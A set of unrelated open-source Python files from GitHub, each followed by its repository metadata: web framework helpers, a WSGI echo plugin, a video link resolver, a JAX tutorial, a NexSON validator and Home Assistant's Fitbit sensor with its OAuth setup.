return page_name
def get_page_title(self):
return self.get("title") or (self.name.replace("-", " ").replace("_", " ").title())
| {
"content_hash": "edff35b72af7130e305f0443178f4f86",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 99,
"avg_line_length": 31.080645161290324,
"alnum_prop": 0.7114686040477426,
"repo_name": "gangadharkadam/office_frappe",
"id": "e73d6aae1a0615a241ab80f6bc405b26c2c0262b",
"size": "3958",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "frappe/website/website_generator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "80527"
},
{
"name": "HTML",
"bytes": "60452"
},
{
"name": "JavaScript",
"bytes": "1182079"
},
{
"name": "Python",
"bytes": "906331"
}
],
"symlink_target": ""
} |
import os
from paste import urlmap
from paste import fileapp
from webob.exc import HTTPNotFound
from minreal.client import MinrealClient
from minreal.csp import CSPApp
class EchoClient(MinrealClient):
""" A plugin that echos back any data sent it.
This plugin also provides a simple HTML UI that allows user interaction
as a demonstration.
"""
@classmethod
def app(cls):
""" The 'app' method returns a WSGI app that wraps the plugin."""
        # Here, we build a PythonPaste URLMap WSGI application that will
        # dispatch to our various components.
map = urlmap.URLMap(HTTPNotFound())
# This plugin provides an index page,
index_path = os.path.join(os.path.dirname(__file__),
'static',
'echo.html')
map['/'] = fileapp.FileApp(index_path)
# as well as an app to serve its static assets.
static_path = os.path.join(os.path.dirname(__file__), 'static')
map['/static'] = fileapp.DirectoryApp(static_path)
# The CSPApp must be mounted somewhere in the WSGI tree as this is the
# WSGI app that handles communication with the browser.
map['/csp'] = CSPApp(cls)
return map
def __init__(self, send_func):
# The plugin constructor takes one argument: a callable that sends its
# (unicode) argument to the browser client.
self._send = send_func
def handle_data(self, chunk):
""" Process a chunk of data transmitted from the browser to the plugin.
This 'chunk' will be be a unicode string containing the transmitted
data.
"""
# The EchoClient plugin sends the chunk right back to the browser.
self._send(chunk)
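# A minimal sketch of serving this example (illustrative, not part of the
# plugin itself): Paste's built-in HTTP server can host the WSGI app returned
# by EchoClient.app(). The host and port values are assumptions.
if __name__ == '__main__':
    from paste import httpserver
    httpserver.serve(EchoClient.app(), host='127.0.0.1', port=8080)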
| {
"content_hash": "ffec90f7e26542a9e3f24bf89ae33a09",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 33,
"alnum_prop": 0.6247933884297521,
"repo_name": "desmaj/minreal",
"id": "0d68b023148242f92294be81e2f1e41787b05dc7",
"size": "1815",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "minreal/examples/echo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3623"
},
{
"name": "JavaScript",
"bytes": "36305"
},
{
"name": "Python",
"bytes": "30030"
}
],
"symlink_target": ""
} |
"""
models imports app, but app does not import models so we haven't created
any loops.
"""
import datetime
from flask_peewee.auth import BaseUser # provides password helpers..
from peewee import *
from .app import db
class User(db.Model, BaseUser):
username = CharField()
password = CharField()
email = CharField()
join_date = DateTimeField(default=datetime.datetime.now)
active = BooleanField(default=True)
admin = BooleanField(default=False)
def __unicode__(self):
return self.username
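# A minimal usage sketch (illustrative only): BaseUser supplies the password
# helpers referenced above, so creating a user might look like the commented
# lines below. The username/email values are assumptions.
#     user = User(username='alice', email='alice@example.com', password='')
#     user.set_password('s3cret')   # helper provided by flask_peewee's BaseUser
#     user.save()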
| {
"content_hash": "ecb88c31a5442ea540c206b3433b4413",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 72,
"avg_line_length": 23.130434782608695,
"alnum_prop": 0.706766917293233,
"repo_name": "sloria/flask-template",
"id": "2b8e8e403b59137ee96ed701120c5ce1d73c2db4",
"size": "557",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CoffeeScript",
"bytes": "0"
},
{
"name": "JavaScript",
"bytes": "62860"
},
{
"name": "Python",
"bytes": "3794"
}
],
"symlink_target": ""
} |
"""
OVERALL CREDIT TO:
t0mm0, Eldorado, VOINAGE, BSTRDMKR, tknorris, smokdpi, TheHighway
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from lib import helpers
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class NxloadResolver(UrlResolver):
name = "nxload"
domains = ["nxload.com"]
pattern = '(?://|\.)(nxload\.com)/(?:embed-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.RAND_UA}
html = self.net.http_GET(web_url, headers=headers).content
if html:
match = re.search('''['"]?sources['"]?\s*:\s*\[(.*?)\]''', html, re.DOTALL)
if match:
sources = [(source.rsplit('/', 1).pop(1), source) for source in
re.findall('''['"](.*?)["']''', match.group(1), re.DOTALL)]
return helpers.pick_source(sources) + helpers.append_headers(headers)
raise ResolverError("Video not found")
def get_url(self, host, media_id):
return self._default_get_url(host, media_id)
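# A minimal usage sketch (illustrative): plugins like this one are normally
# driven through the urlresolver front end rather than instantiated directly,
# e.g. urlresolver.resolve('http://nxload.com/embed-abc123'); the embed id
# above is an assumption.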
| {
"content_hash": "f893b85d9f3912dcc56b2f2c95a8896d",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 87,
"avg_line_length": 37.58,
"alnum_prop": 0.6397019691325173,
"repo_name": "dbiesecke/dbiesecke.github.io",
"id": "7cb4a808074ed3047178dfd65e1d8ad93bb64cc5",
"size": "1879",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "repo/script.module.urlresolver/lib/urlresolver/plugins/nxload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23106"
},
{
"name": "HTML",
"bytes": "1689379"
},
{
"name": "JavaScript",
"bytes": "103456"
},
{
"name": "Makefile",
"bytes": "4554"
},
{
"name": "Perl",
"bytes": "2785"
},
{
"name": "Python",
"bytes": "14200477"
},
{
"name": "Shell",
"bytes": "1804"
}
],
"symlink_target": ""
} |
import flax.linen.activation
import numpy as np
import jax
import jax.numpy as jnp
from jax import jit, grad, vmap, random, device_put, device_get
from jax.tree_util import tree_map, tree_leaves, tree_multimap, tree_structure
from flax.linen.activation import relu, sigmoid
from functools import reduce, partial
def init_mlp_params(layers):
layer_maps = list(zip(layers[:-1], layers[1:]))
params = [
{
'weights': np.random.normal(size=(m, n))*np.sqrt(n),
'biases': np.random.normal(size=(m, 1)),
}
for n, m in layer_maps
]
return params
def predict(params, x, activations=None):
if activations is None:
activations = ([relu] * (len(params) - 1)) + [sigmoid]
for i in range(len(params)):
x = activations[i](jnp.dot(params[i]['weights'], x) + params[i]['biases'])
return x[0][0]
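# Minimal usage sketch; the layer sizes, input and target below are
# illustrative assumptions, not part of the tutorial code above.
if __name__ == '__main__':
    params = init_mlp_params([2, 16, 1])
    x = np.random.normal(size=(2, 1))
    y = 1.0
    def loss(p):
        # Squared-error loss on one example; jax.grad differentiates w.r.t. p.
        return (predict(p, x) - y) ** 2
    grads = grad(loss)(params)
    print(predict(params, x), tree_structure(grads))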
| {
"content_hash": "042b806b410b9e5660700c4e81307775",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 82,
"avg_line_length": 29.166666666666668,
"alnum_prop": 0.6354285714285715,
"repo_name": "mattmcd/PyBayes",
"id": "3d778b09112dd6cad3d0a450cbae9ebada584a91",
"size": "875",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/jax_tutorial_20220726.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "240"
},
{
"name": "HTML",
"bytes": "341002"
},
{
"name": "Jupyter Notebook",
"bytes": "11407256"
},
{
"name": "Python",
"bytes": "62547"
},
{
"name": "Stan",
"bytes": "2368"
}
],
"symlink_target": ""
} |
from confiture import Confiture, ConfigFileError
from src.shell.data.data import Data
class ScatTest(object):
def __init__(self, *args, **kwargs):
self.__config = kwargs["clang"]
self.__accuracy = {"arity": list(), "type": list()}
def display(self):
print "Average on ({}):".format(", ".join(self.__pgm.keys()))
ok = sum(map(lambda a: a[0], self.__accuracy["arity"]))
tot = sum(map(lambda a: a[1], self.__accuracy["arity"]))
print "| Arity: {0}/{1} - {2:.2f}%".format(
ok,
tot,
ok*100.0/tot
)
ok = sum(map(lambda a: a[0], self.__accuracy["type"]))
tot = sum(map(lambda a: a[1], self.__accuracy["type"]))
print "| Type: {0}/{1} - {2:.2f}%".format(
ok,
tot,
ok*100.0/tot
)
def out(self, m):
print m
def test_all(self, p_arity, p_type, config):
conf = Confiture("config/templates/test.yaml")
self.__pgm = conf.check_and_get("test/config/" + config)
for pgm, data in self.__pgm.items():
# Step One: execute program with arguments
cmd = "{}/{}".format(data["bin"], pgm)
self.out("Launching {0} inference on {1}".format(p_arity, cmd))
p_arity.launch(cmd, data["args"].split(" ") + [" > /dev/null"], verbose=False)
self.out("Launching {0} inference on {1}".format(p_type, cmd))
p_type.launch(cmd, data["args"].split(" ") + [" > /dev/null"], verbose=False)
# Step Two: parse source
# Create a parser object
src_data = Data(self.__config["data-path"], pgm)
if src_data.parse(cmd, self.__config["lib-path"], data["src"], force=False, verbose=False):
src_data.dump()
else:
src_data.load(verbose=False)
# Finally, compare source with infered results
self.__accuracy["arity"].append(p_arity.get_analysis(pgm, src_data).accuracy(get=True, verbose=False))
self.__accuracy["type"].append(p_type.get_analysis(pgm, src_data).accuracy(get=True, verbose=False))
self.display()
| {
"content_hash": "e5bc5dedec078d629e56f90e07dc28ea",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 114,
"avg_line_length": 44.450980392156865,
"alnum_prop": 0.5147772386413763,
"repo_name": "Frky/scat",
"id": "23388f6e36ef0e02507480903cc139689fcfd758",
"size": "2268",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/shell/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "171879"
},
{
"name": "C++",
"bytes": "146974"
},
{
"name": "CSS",
"bytes": "1387"
},
{
"name": "HTML",
"bytes": "889"
},
{
"name": "Makefile",
"bytes": "864"
},
{
"name": "Python",
"bytes": "211318"
},
{
"name": "Shell",
"bytes": "12754"
}
],
"symlink_target": ""
} |
from flask import Flask, render_template
from videoonline import models
from videoonline.models import db
from videoonline.extensions import bcrypt, login_manager, principals
from flask_principal import identity_loaded, UserNeed, RoleNeed
from flask_login import current_user
def Create_App(Config = 'videoonline.config.DevConfig'):
app = Flask(__name__)
with app.app_context():
app.config.from_object(Config)
        # Load the SQLALCHEMY_DATABASE_URL from config.py into the db object
db.init_app(app)
        # The database is a critical component, so finish all database setup before moving on to the rest
# Init the Flask-Bcrypt via app object
bcrypt.init_app(app)
# Init the Flask-Login via app object
login_manager.init_app(app)
# Init the Flask-Prinicpal via app object
principals.init_app(app)
        # The identity_loaded signal handler needs access to the app object, so it is implemented directly inside Create_App()
@identity_loaded.connect_via(app)
def on_identity_loaded(sender, identity):
"""Change the role via add the Need object into Role.
Need the access the app object.
"""
# Set the identity user object
identity.user = current_user
# Add the UserNeed to the identity user object
if hasattr(current_user, 'id'):
identity.provides.add(UserNeed(current_user.id))
# Add each role to the identity user object
if hasattr(current_user, 'roles'):
                # User-role used to be many-to-many; now each user has a single role (one-to-many), so the for loop was removed
# for role in current_user.roles:
role = current_user.roles
identity.provides.add(RoleNeed(role.name))
app.static_folder = 'theme/static'
app.template_folder = 'theme/templates'
        # Define error handlers for 404, 405, etc.; only 404 is defined here
@app.errorhandler(404)
def page_not_found(error):
return render_template('40X/404.html'), 404
from videoonline.view import root_view
from videoonline.admin import admin_view
app.register_blueprint(root_view, url_prefix = '/')
app.register_blueprint(admin_view, url_prefix = '/admin')
return app
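# A minimal usage sketch (illustrative, not part of the package): running the
# development server with the factory above. The host/port are assumptions.
#     app = Create_App()
#     app.run(host='127.0.0.1', port=5000, debug=True)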
| {
"content_hash": "a5d073bac2d2bb203bd46565de21f787",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 78,
"avg_line_length": 36.540983606557376,
"alnum_prop": 0.6155226558995065,
"repo_name": "zgoo/OVSS-I",
"id": "35e9e9d073d040d30a00bf561e53a9a1ebedc2d2",
"size": "2417",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "videoonline/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "56"
},
{
"name": "HTML",
"bytes": "37830"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "23143"
}
],
"symlink_target": ""
} |
import sys
SCRIPT_NAME = __name__ #@TODO replace with logger...
ERR_STREAM = sys.stderr #@TODO replace with logger...
from nexson_validator import NexSON, NexSONError, ValidationLogger, FilteringLogger, WarningCodes
def error(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: ERROR: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
def warn(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: WARNING: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
def info(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
if __name__ == '__main__':
import json
import os
import codecs
import argparse
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
sys.stderr = codecs.getwriter('utf-8')(sys.stderr)
parser = argparse.ArgumentParser(description='Validate a json file as Open Tree of Life NexSON')
parser.add_argument('--verbose', dest='verbose', action='store_true', default=False, help='verbose output')
parser.add_argument('--meta', dest='meta', action='store_true', default=False, help='warn about unvalidated meta elements')
parser.add_argument('input', metavar='filepath', type=unicode, nargs=1, help='filename')
args = parser.parse_args()
SCRIPT_NAME = os.path.split(sys.argv[0])[-1]
try:
inp_filepath = args.input[0]
except:
sys.exit('Expecting a filepath to a NexSON file as the only argument.\n')
inp = codecs.open(inp_filepath, 'rU', encoding='utf-8')
try:
obj = json.load(inp)
except ValueError as vx:
error('Not valid JSON.')
if args.verbose:
raise vx
else:
sys.exit(1)
if not args.meta:
v = FilteringLogger(codes_to_skip=[WarningCodes.UNVALIDATED_ANNOTATION])
else:
v = ValidationLogger()
try:
n = NexSON(obj, v)
except NexSONError as nx:
error(nx.value)
sys.exit(1)
if (not v.errors) and (not v.warnings):
info('Valid')
elif v.errors:
for el in v.errors:
error(el)
else:
for el in v.warnings:
warn(el)
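# Example invocation (the input file name is illustrative):
#     python validate_ot_nexson.py --verbose my_study.json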
| {
"content_hash": "e040c479eab2f3fa0c825b314df3b585",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 127,
"avg_line_length": 35.114285714285714,
"alnum_prop": 0.5850284784377543,
"repo_name": "leto/new_opentree_api",
"id": "785ab74f98424df54041f3914d6a9b9f2e39730a",
"size": "2480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nexson-validator/scripts/validate_ot_nexson.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "150369"
},
{
"name": "Shell",
"bytes": "6452"
}
],
"symlink_target": ""
} |
"""
Support for the Fitbit API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fitbit/
"""
import os
import logging
import datetime
import time
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.icon import icon_for_battery_level
import homeassistant.helpers.config_validation as cv
from homeassistant.util.json import load_json, save_json
REQUIREMENTS = ['fitbit==0.3.0']
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
ATTR_ACCESS_TOKEN = 'access_token'
ATTR_REFRESH_TOKEN = 'refresh_token'
ATTR_CLIENT_ID = 'client_id'
ATTR_CLIENT_SECRET = 'client_secret'
ATTR_LAST_SAVED_AT = 'last_saved_at'
CONF_MONITORED_RESOURCES = 'monitored_resources'
CONF_CLOCK_FORMAT = 'clock_format'
CONF_ATTRIBUTION = 'Data provided by Fitbit.com'
DEPENDENCIES = ['http']
FITBIT_AUTH_CALLBACK_PATH = '/api/fitbit/callback'
FITBIT_AUTH_START = '/api/fitbit'
FITBIT_CONFIG_FILE = 'fitbit.conf'
FITBIT_DEFAULT_RESOURCES = ['activities/steps']
SCAN_INTERVAL = datetime.timedelta(minutes=30)
DEFAULT_CONFIG = {
'client_id': 'CLIENT_ID_HERE',
'client_secret': 'CLIENT_SECRET_HERE'
}
FITBIT_RESOURCES_LIST = {
'activities/activityCalories': ['Activity Calories', 'cal', 'fire'],
'activities/calories': ['Calories', 'cal', 'fire'],
'activities/caloriesBMR': ['Calories BMR', 'cal', 'fire'],
'activities/distance': ['Distance', '', 'map-marker'],
'activities/elevation': ['Elevation', '', 'walk'],
'activities/floors': ['Floors', 'floors', 'walk'],
'activities/heart': ['Resting Heart Rate', 'bpm', 'heart-pulse'],
'activities/minutesFairlyActive':
['Minutes Fairly Active', 'minutes', 'walk'],
'activities/minutesLightlyActive':
['Minutes Lightly Active', 'minutes', 'walk'],
'activities/minutesSedentary':
['Minutes Sedentary', 'minutes', 'seat-recline-normal'],
'activities/minutesVeryActive': ['Minutes Very Active', 'minutes', 'run'],
'activities/steps': ['Steps', 'steps', 'walk'],
'activities/tracker/activityCalories':
['Tracker Activity Calories', 'cal', 'fire'],
'activities/tracker/calories': ['Tracker Calories', 'cal', 'fire'],
'activities/tracker/distance': ['Tracker Distance', '', 'map-marker'],
'activities/tracker/elevation': ['Tracker Elevation', '', 'walk'],
'activities/tracker/floors': ['Tracker Floors', 'floors', 'walk'],
'activities/tracker/minutesFairlyActive':
['Tracker Minutes Fairly Active', 'minutes', 'walk'],
'activities/tracker/minutesLightlyActive':
['Tracker Minutes Lightly Active', 'minutes', 'walk'],
'activities/tracker/minutesSedentary':
['Tracker Minutes Sedentary', 'minutes', 'seat-recline-normal'],
'activities/tracker/minutesVeryActive':
['Tracker Minutes Very Active', 'minutes', 'run'],
'activities/tracker/steps': ['Tracker Steps', 'steps', 'walk'],
'body/bmi': ['BMI', 'BMI', 'human'],
'body/fat': ['Body Fat', '%', 'human'],
'body/weight': ['Weight', '', 'human'],
'devices/battery': ['Battery', None, None],
'sleep/awakeningsCount':
['Awakenings Count', 'times awaken', 'sleep'],
'sleep/efficiency': ['Sleep Efficiency', '%', 'sleep'],
'sleep/minutesAfterWakeup': ['Minutes After Wakeup', 'minutes', 'sleep'],
'sleep/minutesAsleep': ['Sleep Minutes Asleep', 'minutes', 'sleep'],
'sleep/minutesAwake': ['Sleep Minutes Awake', 'minutes', 'sleep'],
'sleep/minutesToFallAsleep':
['Sleep Minutes to Fall Asleep', 'minutes', 'sleep'],
'sleep/startTime': ['Sleep Start Time', None, 'clock'],
'sleep/timeInBed': ['Sleep Time in Bed', 'minutes', 'hotel']
}
FITBIT_MEASUREMENTS = {
'en_US': {
'duration': 'ms',
'distance': 'mi',
'elevation': 'ft',
'height': 'in',
'weight': 'lbs',
'body': 'in',
'liquids': 'fl. oz.',
'blood glucose': 'mg/dL',
'battery': '',
},
'en_GB': {
'duration': 'milliseconds',
'distance': 'kilometers',
'elevation': 'meters',
'height': 'centimeters',
'weight': 'stone',
'body': 'centimeters',
'liquids': 'milliliters',
'blood glucose': 'mmol/L',
'battery': '',
},
'metric': {
'duration': 'milliseconds',
'distance': 'kilometers',
'elevation': 'meters',
'height': 'centimeters',
'weight': 'kilograms',
'body': 'centimeters',
'liquids': 'milliliters',
'blood glucose': 'mmol/L',
'battery': '',
}
}
BATTERY_LEVELS = {
'High': 100,
'Medium': 50,
'Low': 20,
'Empty': 0
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_MONITORED_RESOURCES, default=FITBIT_DEFAULT_RESOURCES):
vol.All(cv.ensure_list, [vol.In(FITBIT_RESOURCES_LIST)]),
vol.Optional(CONF_CLOCK_FORMAT, default='24H'):
vol.In(['12H', '24H'])
})
def request_app_setup(hass, config, add_devices, config_path,
discovery_info=None):
"""Assist user with configuring the Fitbit dev application."""
configurator = hass.components.configurator
# pylint: disable=unused-argument
def fitbit_configuration_callback(callback_data):
"""Handle configuration updates."""
config_path = hass.config.path(FITBIT_CONFIG_FILE)
if os.path.isfile(config_path):
config_file = load_json(config_path)
if config_file == DEFAULT_CONFIG:
error_msg = ("You didn't correctly modify fitbit.conf",
" please try again")
configurator.notify_errors(_CONFIGURING['fitbit'],
error_msg)
else:
setup_platform(hass, config, add_devices, discovery_info)
else:
setup_platform(hass, config, add_devices, discovery_info)
start_url = "{}{}".format(hass.config.api.base_url,
FITBIT_AUTH_CALLBACK_PATH)
description = """Please create a Fitbit developer app at
https://dev.fitbit.com/apps/new.
For the OAuth 2.0 Application Type choose Personal.
Set the Callback URL to {}.
They will provide you a Client ID and secret.
These need to be saved into the file located at: {}.
Then come back here and hit the below button.
""".format(start_url, config_path)
submit = "I have saved my Client ID and Client Secret into fitbit.conf."
_CONFIGURING['fitbit'] = configurator.request_config(
'Fitbit', fitbit_configuration_callback,
description=description, submit_caption=submit,
description_image="/static/images/config_fitbit_app.png"
)
def request_oauth_completion(hass):
"""Request user complete Fitbit OAuth2 flow."""
configurator = hass.components.configurator
if "fitbit" in _CONFIGURING:
configurator.notify_errors(
_CONFIGURING['fitbit'], "Failed to register, please try again.")
return
# pylint: disable=unused-argument
def fitbit_configuration_callback(callback_data):
"""Handle configuration updates."""
start_url = '{}{}'.format(hass.config.api.base_url, FITBIT_AUTH_START)
description = "Please authorize Fitbit by visiting {}".format(start_url)
_CONFIGURING['fitbit'] = configurator.request_config(
'Fitbit', fitbit_configuration_callback,
description=description,
submit_caption="I have authorized Fitbit."
)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Fitbit sensor."""
config_path = hass.config.path(FITBIT_CONFIG_FILE)
if os.path.isfile(config_path):
config_file = load_json(config_path)
if config_file == DEFAULT_CONFIG:
request_app_setup(
hass, config, add_devices, config_path, discovery_info=None)
return False
else:
config_file = save_json(config_path, DEFAULT_CONFIG)
request_app_setup(
hass, config, add_devices, config_path, discovery_info=None)
return False
if "fitbit" in _CONFIGURING:
hass.components.configurator.request_done(_CONFIGURING.pop("fitbit"))
import fitbit
access_token = config_file.get(ATTR_ACCESS_TOKEN)
refresh_token = config_file.get(ATTR_REFRESH_TOKEN)
expires_at = config_file.get(ATTR_LAST_SAVED_AT)
if None not in (access_token, refresh_token):
authd_client = fitbit.Fitbit(config_file.get(ATTR_CLIENT_ID),
config_file.get(ATTR_CLIENT_SECRET),
access_token=access_token,
refresh_token=refresh_token,
expires_at=expires_at,
refresh_cb=lambda x: None)
if int(time.time()) - expires_at > 3600:
authd_client.client.refresh_token()
authd_client.system = authd_client.user_profile_get()["user"]["locale"]
if authd_client.system != 'en_GB':
if hass.config.units.is_metric:
authd_client.system = 'metric'
else:
authd_client.system = 'en_US'
dev = []
registered_devs = authd_client.get_devices()
clock_format = config.get(CONF_CLOCK_FORMAT)
for resource in config.get(CONF_MONITORED_RESOURCES):
# monitor battery for all linked FitBit devices
if resource == 'devices/battery':
for dev_extra in registered_devs:
dev.append(FitbitSensor(
authd_client, config_path, resource,
hass.config.units.is_metric, clock_format, dev_extra))
else:
dev.append(FitbitSensor(
authd_client, config_path, resource,
hass.config.units.is_metric, clock_format))
add_devices(dev, True)
else:
oauth = fitbit.api.FitbitOauth2Client(
config_file.get(ATTR_CLIENT_ID),
config_file.get(ATTR_CLIENT_SECRET))
redirect_uri = '{}{}'.format(hass.config.api.base_url,
FITBIT_AUTH_CALLBACK_PATH)
fitbit_auth_start_url, _ = oauth.authorize_token_url(
redirect_uri=redirect_uri,
scope=['activity', 'heartrate', 'nutrition', 'profile',
'settings', 'sleep', 'weight'])
hass.http.register_redirect(FITBIT_AUTH_START, fitbit_auth_start_url)
hass.http.register_view(FitbitAuthCallbackView(
config, add_devices, oauth))
request_oauth_completion(hass)
class FitbitAuthCallbackView(HomeAssistantView):
"""Handle OAuth finish callback requests."""
requires_auth = False
url = FITBIT_AUTH_CALLBACK_PATH
name = 'api:fitbit:callback'
def __init__(self, config, add_devices, oauth):
"""Initialize the OAuth callback view."""
self.config = config
self.add_devices = add_devices
self.oauth = oauth
@callback
def get(self, request):
"""Finish OAuth callback request."""
from oauthlib.oauth2.rfc6749.errors import MismatchingStateError
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
hass = request.app['hass']
data = request.query
response_message = """Fitbit has been successfully authorized!
You can close this window now!"""
result = None
if data.get('code') is not None:
redirect_uri = '{}{}'.format(
hass.config.api.base_url, FITBIT_AUTH_CALLBACK_PATH)
try:
result = self.oauth.fetch_access_token(data.get('code'),
redirect_uri)
except MissingTokenError as error:
_LOGGER.error("Missing token: %s", error)
response_message = """Something went wrong when
attempting authenticating with Fitbit. The error
encountered was {}. Please try again!""".format(error)
except MismatchingStateError as error:
_LOGGER.error("Mismatched state, CSRF error: %s", error)
response_message = """Something went wrong when
attempting authenticating with Fitbit. The error
encountered was {}. Please try again!""".format(error)
else:
_LOGGER.error("Unknown error when authing")
response_message = """Something went wrong when
attempting authenticating with Fitbit.
An unknown error occurred. Please try again!
"""
if result is None:
_LOGGER.error("Unknown error when authing")
response_message = """Something went wrong when
attempting authenticating with Fitbit.
An unknown error occurred. Please try again!
"""
html_response = """<html><head><title>Fitbit Auth</title></head>
<body><h1>{}</h1></body></html>""".format(response_message)
if result:
config_contents = {
ATTR_ACCESS_TOKEN: result.get('access_token'),
ATTR_REFRESH_TOKEN: result.get('refresh_token'),
ATTR_CLIENT_ID: self.oauth.client_id,
ATTR_CLIENT_SECRET: self.oauth.client_secret,
ATTR_LAST_SAVED_AT: int(time.time())
}
save_json(hass.config.path(FITBIT_CONFIG_FILE), config_contents)
hass.async_add_job(setup_platform, hass, self.config, self.add_devices)
return html_response
class FitbitSensor(Entity):
"""Implementation of a Fitbit sensor."""
def __init__(self, client, config_path, resource_type,
is_metric, clock_format, extra=None):
"""Initialize the Fitbit sensor."""
self.client = client
self.config_path = config_path
self.resource_type = resource_type
self.is_metric = is_metric
self.clock_format = clock_format
self.extra = extra
self._name = FITBIT_RESOURCES_LIST[self.resource_type][0]
if self.extra:
self._name = '{0} Battery'.format(self.extra.get('deviceVersion'))
unit_type = FITBIT_RESOURCES_LIST[self.resource_type][1]
if unit_type == "":
split_resource = self.resource_type.split('/')
try:
measurement_system = FITBIT_MEASUREMENTS[self.client.system]
except KeyError:
if self.is_metric:
measurement_system = FITBIT_MEASUREMENTS['metric']
else:
measurement_system = FITBIT_MEASUREMENTS['en_US']
unit_type = measurement_system[split_resource[-1]]
self._unit_of_measurement = unit_type
self._state = 0
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if self.resource_type == 'devices/battery' and self.extra:
battery_level = BATTERY_LEVELS[self.extra.get('battery')]
return icon_for_battery_level(battery_level=battery_level,
charging=None)
return 'mdi:{}'.format(FITBIT_RESOURCES_LIST[self.resource_type][2])
@property
def device_state_attributes(self):
"""Return the state attributes."""
attrs = {}
attrs[ATTR_ATTRIBUTION] = CONF_ATTRIBUTION
if self.extra:
attrs['model'] = self.extra.get('deviceVersion')
attrs['type'] = self.extra.get('type').lower()
return attrs
def update(self):
"""Get the latest data from the Fitbit API and update the states."""
if self.resource_type == 'devices/battery' and self.extra:
self._state = self.extra.get('battery')
else:
container = self.resource_type.replace("/", "-")
response = self.client.time_series(self.resource_type, period='7d')
raw_state = response[container][-1].get('value')
if self.resource_type == 'activities/distance':
self._state = format(float(raw_state), '.2f')
elif self.resource_type == 'activities/tracker/distance':
self._state = format(float(raw_state), '.2f')
elif self.resource_type == 'body/bmi':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'body/fat':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'body/weight':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'sleep/startTime':
if raw_state == '':
self._state = '-'
elif self.clock_format == '12H':
hours, minutes = raw_state.split(':')
hours, minutes = int(hours), int(minutes)
setting = 'AM'
if hours > 12:
setting = 'PM'
hours -= 12
elif hours == 0:
hours = 12
self._state = '{}:{} {}'.format(hours, minutes, setting)
else:
self._state = raw_state
else:
if self.is_metric:
self._state = raw_state
else:
try:
self._state = '{0:,}'.format(int(raw_state))
except TypeError:
self._state = raw_state
if self.resource_type == 'activities/heart':
self._state = response[container][-1]. \
get('value').get('restingHeartRate')
token = self.client.client.session.token
config_contents = {
ATTR_ACCESS_TOKEN: token.get('access_token'),
ATTR_REFRESH_TOKEN: token.get('refresh_token'),
ATTR_CLIENT_ID: self.client.client.client_id,
ATTR_CLIENT_SECRET: self.client.client.client_secret,
ATTR_LAST_SAVED_AT: int(time.time())
}
save_json(self.config_path, config_contents)
